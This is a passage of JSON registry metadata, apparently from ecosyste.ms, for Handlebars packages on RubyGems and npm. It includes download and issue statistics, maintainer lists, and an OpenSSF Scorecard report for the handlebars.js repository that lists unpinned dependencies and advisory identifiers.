https://app.stepsecurity.io/secureworkflow/handlebars-lang/handlebars.js/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/release.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/handlebars-lang/handlebars.js/release.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/release.yml:23: update your workflow using https://app.stepsecurity.io/secureworkflow/handlebars-lang/handlebars.js/release.yml/master?enable=pin","Warn: npmCommand not pinned by hash: tests/integration/rollup-test/test.sh:7","Warn: npmCommand not pinned by hash: tests/integration/webpack-babel-test/test.sh:7","Warn: npmCommand not pinned by hash: tests/integration/webpack-test/test.sh:7","Info:   0 out of   8 GitHub-owned GitHubAction dependencies pinned","Info:   4 out of   7 npmCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 26 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":0,"reason":"59 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-67hx-6x53-jw92","Warn: Project is vulnerable to: GHSA-qwcr-r2fm-qrc7","Warn: Project is vulnerable to: GHSA-v6h2-p8h4-qcjw","Warn: Project is vulnerable to: GHSA-cwfw-4gq5-mrqx","Warn: Project is vulnerable to: GHSA-g95f-p29q-9xw4","Warn: Project is vulnerable to: GHSA-grv7-fg5c-xmjg","Warn: Project is vulnerable to: GHSA-pxg6-pf52-xh8x","Warn: Project is vulnerable to: GHSA-3xgq-45jj-v275","Warn: Project is vulnerable to: GHSA-gxpj-cx7g-858c","Warn: Project is vulnerable to: GHSA-w573-4hg7-7wgq","Warn: Project is vulnerable to: GHSA-c6rp-wrp9-qr4q","Warn: Project is vulnerable to: GHSA-rv95-896h-c2vc","Warn: Project is vulnerable to: GHSA-qw6h-vgh9-j6wx","Warn: Project is vulnerable to: GHSA-jchw-25xp-jwwc","Warn: Project is vulnerable to: GHSA-cxjh-pqwp-8mfp","Warn: Project is vulnerable to: GHSA-fjxv-7rqg-78g4","Warn: Project is vulnerable to: GHSA-4q6p-r6v2-jvc5","Warn: Project is vulnerable to: GHSA-c7qv-q95q-8v27","Warn: Project is vulnerable to: GHSA-qqgx-2p2h-9c37","Warn: Project is vulnerable to: GHSA-9c47-m6qq-7p4h","Warn: Project is vulnerable to: GHSA-76p3-8jx3-jpfq","Warn: Project is vulnerable to: GHSA-jf85-cpcp-j695","Warn: Project is vulnerable to: GHSA-fvqr-27wr-82fm","Warn: Project is vulnerable to: GHSA-4xc9-xhrj-v574","Warn: Project is vulnerable to: GHSA-x5rq-j2xg-h7qm","Warn: Project is vulnerable to: GHSA-p6mc-m468-83gw","Warn: Project is vulnerable to: GHSA-29mw-wpgm-hmr9","Warn: Project is vulnerable to: GHSA-35jh-r3h4-6jhm","Warn: Project is vulnerable to: GHSA-952p-6rrq-rcjv","Warn: Project is vulnerable to: GHSA-hxm2-r34f-qmc5","Warn: Project is vulnerable to: GHSA-f8q6-p94x-37v3","Warn: Project is vulnerable to: GHSA-vh95-rmgr-6w4m","Warn: Project is vulnerable to: GHSA-xvch-5gv4-984h","Warn: Project is vulnerable to: GHSA-76c9-3jph-rj3q","Warn: Project is vulnerable to: GHSA-28xh-wpgr-7fm8","Warn: Project is vulnerable to: GHSA-9wv6-86v2-598j","Warn: Project is vulnerable to: GHSA-rhx6-c78j-4q9w","Warn: Project is vulnerable to: GHSA-hrpp-h998-j3pp","Warn: Project is vulnerable to: GHSA-p8p7-x288-28g6","Warn: Project is vulnerable to: GHSA-x3m3-4wpv-5vgc","Warn: Project is vulnerable to: GHSA-c2qf-rxjj-qqgw","Warn: Project is vulnerable to: GHSA-m6fv-jmcg-4jfg","Warn: Project is vulnerable to: GHSA-cm22-4g7w-348p","Warn: Project is vulnerable to: GHSA-3jfq-g458-7qm9","Warn: Project is vulnerable to: GHSA-5955-9wpr-37jh","Warn: Project is vulnerable to: GHSA-f5x3-32g6-xq36","Warn: Project is vulnerable to: GHSA-r628-mhmh-qjhw","Warn: Project is vulnerable to: GHSA-9r2w-394v-53qc","Warn: Project is vulnerable to: GHSA-qq89-hq3f-393p","Warn: Project is vulnerable to: GHSA-52f5-9888-hmc6","Warn: Project is vulnerable to: GHSA-72xf-g2v4-qvf3","Warn: Project is vulnerable to: GHSA-7p7h-4mm5-852v","Warn: Project is vulnerable to: GHSA-wr3j-pwj9-hqq6","Warn: Project is vulnerable to: GHSA-cf66-xwfp-gvc4","Warn: Project is vulnerable to: GHSA-4v9v-hfq4-rm2v","Warn: Project is vulnerable to: GHSA-9jgg-88mc-972h","Warn: Project is vulnerable to: GHSA-j8xg-fqg3-53r7","Warn: Project is vulnerable to: GHSA-3h5v-q93c-6h6q","Warn: Project is vulnerable to: GHSA-776f-qx25-q3cc"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-19T09:08:48.273Z","repository_id":998342,"created_at":"2025-08-19T09:08:48.274Z","updated_at":"2025-08-19T09:08:48.274Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":35619777,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-05-26T15:22:16.424Z","status":"online","status_checked_at":"2026-07-18T02:00:07.223Z","response_time":61,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"tags":[]},"repo_metadata_updated_at":"2026-07-22T12:58:04.531Z","dependent_packages_count":0,"downloads":2795545,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":2.07994290564834,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":0.69331430188278},"purl":"pkg:gem/handlebars-source?repository_url=https://gem.coop","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/rubygems/handlebars-source","docker_dependents_count":3,"docker_downloads_count":713,"usage_url":"https://repos.ecosyste.ms/usage/rubygems/handlebars-source","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/rubygems/handlebars-source/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-07-10T08:00:54.096Z","issues_count":161,"pull_requests_count":133,"avg_time_to_close_issue":20524950.96153846,"avg_time_to_close_pull_request":16796463.59090909,"issues_closed_count":104,"pull_requests_closed_count":88,"pull_request_authors_count":53,"issue_authors_count":142,"avg_comments_per_issue":3.111801242236025,"avg_comments_per_pull_request":1.699248120300752,"merged_pull_requests_count":57,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":19,"past_year_pull_requests_count":32,"past_year_avg_time_to_close_issue":1112205.857142857,"past_year_avg_time_to_close_pull_request":822488.2222222222,"past_year_issues_closed_count":7,"past_year_pull_requests_closed_count":18,"past_year_pull_request_authors_count":16,"past_year_issue_authors_count":17,"past_year_avg_comments_per_issue":1.263157894736842,"past_year_avg_comments_per_pull_request":1.40625,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":15,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/issues","maintainers":[{"login":"jaylinski","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaylinski"},{"login":"nknapp","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nknapp"}],"active_maintainers":[{"login":"jaylinski","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaylinski"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/gem.coop/packages/handlebars-source/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/gem.coop/packages/handlebars-source/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/gem.coop/packages/handlebars-source/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/gem.coop/packages/handlebars-source/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/gem.coop/packages/handlebars-source/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/gem.coop/packages/handlebars-source/codemeta","maintainers":[{"uuid":"1522","login":"wycats","name":null,"email":null,"url":null,"packages_count":80,"html_url":"https://gem.coop/profiles/wycats","role":null,"created_at":"2025-10-07T20:13:17.157Z","updated_at":"2025-10-07T20:13:17.157Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/gem.coop/maintainers/wycats/packages"},{"uuid":"3176","login":null,"name":null,"email":null,"url":null,"packages_count":16,"html_url":"https://gem.coop/profiles/","role":null,"created_at":"2025-10-07T20:13:17.235Z","updated_at":"2025-10-07T20:13:17.235Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/gem.coop/maintainers/3176/packages"},{"uuid":"43479","login":"rwjblue","name":null,"email":null,"url":null,"packages_count":10,"html_url":"https://gem.coop/profiles/rwjblue","role":null,"created_at":"2025-10-07T20:13:17.284Z","updated_at":"2025-10-07T20:13:17.284Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/gem.coop/maintainers/rwjblue/packages"},{"uuid":"55440","login":"machty","name":null,"email":null,"url":null,"packages_count":14,"html_url":"https://gem.coop/profiles/machty","role":null,"created_at":"2025-10-07T20:13:17.111Z","updated_at":"2025-10-07T20:13:17.111Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/gem.coop/maintainers/machty/packages"},{"uuid":"73375","login":"kpdecker","name":null,"email":null,"url":null,"packages_count":1,"html_url":"https://gem.coop/profiles/kpdecker","role":null,"created_at":"2025-10-07T20:13:17.324Z","updated_at":"2025-10-07T20:13:17.324Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/gem.coop/maintainers/kpdecker/packages"},{"uuid":"107178","login":"lawnsea","name":null,"email":null,"url":null,"packages_count":1,"html_url":"https://gem.coop/profiles/lawnsea","role":null,"created_at":"2025-10-07T20:13:17.363Z","updated_at":"2025-10-07T20:13:17.363Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/gem.coop/maintainers/lawnsea/packages"},{"uuid":"108720","login":"nknapp","name":null,"email":null,"url":null,"packages_count":1,"html_url":"https://gem.coop/profiles/nknapp","role":null,"created_at":"2025-10-07T20:13:17.430Z","updated_at":"2025-10-07T20:13:17.430Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/gem.coop/maintainers/nknapp/packages"},{"uuid":"105882","login":"ErisDS","name":null,"email":null,"url":null,"packages_count":1,"html_url":"https://gem.coop/profiles/ErisDS","role":null,"created_at":"2025-10-07T20:13:17.499Z","updated_at":"2025-10-07T20:13:17.499Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/gem.coop/maintainers/ErisDS/packages"},{"uuid":"180410","login":"jaylinski","name":null,"email":null,"url":null,"packages_count":1,"html_url":"https://gem.coop/profiles/jaylinski","role":null,"created_at":"2025-10-07T20:13:17.560Z","updated_at":"2025-10-07T20:13:17.560Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/gem.coop/maintainers/jaylinski/packages"}],"registry":{"name":"gem.coop","url":"https://gem.coop","ecosystem":"rubygems","default":false,"packages_count":194467,"maintainers_count":68263,"namespaces_count":0,"keywords_count":18400,"github":"gem-coop","metadata":{"funded_packages_count":6885},"icon_url":"https://github.com/gem-coop.png","created_at":"2025-10-06T17:24:20.932Z","updated_at":"2026-06-10T05:17:24.062Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/gem.coop/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/gem.coop/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/gem.coop/namespaces"}},{"id":8055187,"name":"@mkilp/handlebars","ecosystem":"npm","description":"Handlebars provides the power necessary to let you build semantic templates effectively with no frustration","homepage":"https://www.handlebarsjs.com/","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/handlebars-lang/handlebars.js","keywords_array":["handlebars","mustache","template","html"],"namespace":"mkilp","versions_count":1,"first_release_published_at":"2023-08-10T14:51:44.259Z","latest_release_published_at":"2023-08-10T14:51:44.259Z","latest_release_number":"5.0.0-alpha.1","last_synced_at":"2026-07-19T22:22:29.085Z","created_at":"2023-08-10T18:01:24.533Z","updated_at":"2026-07-19T22:22:29.085Z","registry_url":"https://www.npmjs.com/package/@mkilp/handlebars","install_command":"npm install @mkilp/handlebars","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"latest":"5.0.0-alpha.1"}},"repo_metadata":{"id":998342,"uuid":"809601","full_name":"handlebars-lang/handlebars.js","owner":"handlebars-lang","description":"Minimal templating on steroids.","archived":false,"fork":false,"pushed_at":"2026-06-24T23:40:45.000Z","size":4613,"stargazers_count":18652,"open_issues_count":110,"forks_count":2065,"subscribers_count":432,"default_branch":"master","last_synced_at":"2026-07-18T08:04:33.114Z","etag":null,"topics":["handlebars","mustache","templates"],"latest_commit_sha":null,"homepage":"http://handlebarsjs.com","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":"linkedin/Burrow","license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/handlebars-lang.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2010-07-31T18:54:46.000Z","updated_at":"2026-07-17T19:48:10.000Z","dependencies_parsed_at":"2023-09-22T06:08:40.588Z","dependency_job_id":"57b49b24-4bc7-4df8-b069-e31179883809","html_url":"https://github.com/handlebars-lang/handlebars.js","commit_stats":{"total_commits":1718,"total_committers":206,"mean_commits":8.339805825242719,"dds":0.519208381839348,"last_synced_commit":"f422bfdf3ed321c32c6eecfaa778de46275fb76d"},"previous_names":["wycats/handlebars.js"],"tags_count":90,"template":false,"template_full_name":null,"purl":"pkg:github/handlebars-lang/handlebars.js","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/handlebars-lang","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/sbom","scorecard":{"id":454219,"data":{"date":"2025-08-11","repo":{"name":"github.com/handlebars-lang/handlebars.js","commit":"cc8574e63121861c1c89ef495f9be89ef7dd2413"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":4,"checks":[{"name":"Code-Review","score":3,"reason":"Found 9/24 approved changesets -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Maintained","score":1,"reason":"1 commit(s) and 1 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/ci.yml:1","Warn: no topLevel permission defined: .github/workflows/release.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":2,"reason":"dependency not pinned by hash detected -- score normalized to 2","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/handlebars-lang/handlebars.js/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/handlebars-lang/handlebars.js/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/handlebars-lang/handlebars.js/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/handlebars-lang/handlebars.js/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:66: update your workflow using https://app.stepsecurity.io/secureworkflow/handlebars-lang/handlebars.js/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:71: update your workflow using https://app.stepsecurity.io/secureworkflow/handlebars-lang/handlebars.js/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/release.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/handlebars-lang/handlebars.js/release.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/release.yml:23: update your workflow using https://app.stepsecurity.io/secureworkflow/handlebars-lang/handlebars.js/release.yml/master?enable=pin","Warn: npmCommand not pinned by hash: tests/integration/rollup-test/test.sh:7","Warn: npmCommand not pinned by hash: tests/integration/webpack-babel-test/test.sh:7","Warn: npmCommand not pinned by hash: tests/integration/webpack-test/test.sh:7","Info:   0 out of   8 GitHub-owned GitHubAction dependencies pinned","Info:   4 out of   7 npmCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 26 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":0,"reason":"59 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-67hx-6x53-jw92","Warn: Project is vulnerable to: GHSA-qwcr-r2fm-qrc7","Warn: Project is vulnerable to: GHSA-v6h2-p8h4-qcjw","Warn: Project is vulnerable to: GHSA-cwfw-4gq5-mrqx","Warn: Project is vulnerable to: GHSA-g95f-p29q-9xw4","Warn: Project is vulnerable to: GHSA-grv7-fg5c-xmjg","Warn: Project is vulnerable to: GHSA-pxg6-pf52-xh8x","Warn: Project is vulnerable to: GHSA-3xgq-45jj-v275","Warn: Project is vulnerable to: GHSA-gxpj-cx7g-858c","Warn: Project is vulnerable to: GHSA-w573-4hg7-7wgq","Warn: Project is vulnerable to: GHSA-c6rp-wrp9-qr4q","Warn: Project is vulnerable to: GHSA-rv95-896h-c2vc","Warn: Project is vulnerable to: GHSA-qw6h-vgh9-j6wx","Warn: Project is vulnerable to: GHSA-jchw-25xp-jwwc","Warn: Project is vulnerable to: GHSA-cxjh-pqwp-8mfp","Warn: Project is vulnerable to: GHSA-fjxv-7rqg-78g4","Warn: Project is vulnerable to: GHSA-4q6p-r6v2-jvc5","Warn: Project is vulnerable to: GHSA-c7qv-q95q-8v27","Warn: Project is vulnerable to: GHSA-qqgx-2p2h-9c37","Warn: Project is vulnerable to: GHSA-9c47-m6qq-7p4h","Warn: Project is vulnerable to: GHSA-76p3-8jx3-jpfq","Warn: Project is vulnerable to: GHSA-jf85-cpcp-j695","Warn: Project is vulnerable to: GHSA-fvqr-27wr-82fm","Warn: Project is vulnerable to: GHSA-4xc9-xhrj-v574","Warn: Project is vulnerable to: GHSA-x5rq-j2xg-h7qm","Warn: Project is vulnerable to: GHSA-p6mc-m468-83gw","Warn: Project is vulnerable to: GHSA-29mw-wpgm-hmr9","Warn: Project is vulnerable to: GHSA-35jh-r3h4-6jhm","Warn: Project is vulnerable to: GHSA-952p-6rrq-rcjv","Warn: Project is vulnerable to: GHSA-hxm2-r34f-qmc5","Warn: Project is vulnerable to: GHSA-f8q6-p94x-37v3","Warn: Project is vulnerable to: GHSA-vh95-rmgr-6w4m","Warn: Project is vulnerable to: GHSA-xvch-5gv4-984h","Warn: Project is vulnerable to: GHSA-76c9-3jph-rj3q","Warn: Project is vulnerable to: GHSA-28xh-wpgr-7fm8","Warn: Project is vulnerable to: GHSA-9wv6-86v2-598j","Warn: Project is vulnerable to: GHSA-rhx6-c78j-4q9w","Warn: Project is vulnerable to: GHSA-hrpp-h998-j3pp","Warn: Project is vulnerable to: GHSA-p8p7-x288-28g6","Warn: Project is vulnerable to: GHSA-x3m3-4wpv-5vgc","Warn: Project is vulnerable to: GHSA-c2qf-rxjj-qqgw","Warn: Project is vulnerable to: GHSA-m6fv-jmcg-4jfg","Warn: Project is vulnerable to: GHSA-cm22-4g7w-348p","Warn: Project is vulnerable to: GHSA-3jfq-g458-7qm9","Warn: Project is vulnerable to: GHSA-5955-9wpr-37jh","Warn: Project is vulnerable to: GHSA-f5x3-32g6-xq36","Warn: Project is vulnerable to: GHSA-r628-mhmh-qjhw","Warn: Project is vulnerable to: GHSA-9r2w-394v-53qc","Warn: Project is vulnerable to: GHSA-qq89-hq3f-393p","Warn: Project is vulnerable to: GHSA-52f5-9888-hmc6","Warn: Project is vulnerable to: GHSA-72xf-g2v4-qvf3","Warn: Project is vulnerable to: GHSA-7p7h-4mm5-852v","Warn: Project is vulnerable to: GHSA-wr3j-pwj9-hqq6","Warn: Project is vulnerable to: GHSA-cf66-xwfp-gvc4","Warn: Project is vulnerable to: GHSA-4v9v-hfq4-rm2v","Warn: Project is vulnerable to: GHSA-9jgg-88mc-972h","Warn: Project is vulnerable to: GHSA-j8xg-fqg3-53r7","Warn: Project is vulnerable to: GHSA-3h5v-q93c-6h6q","Warn: Project is vulnerable to: GHSA-776f-qx25-q3cc"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-19T09:08:48.273Z","repository_id":998342,"created_at":"2025-08-19T09:08:48.274Z","updated_at":"2025-08-19T09:08:48.274Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":35619777,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-05-26T15:22:16.424Z","status":"online","status_checked_at":"2026-07-18T02:00:07.223Z","response_time":61,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"handlebars-lang","name":"The Handlebars Templating 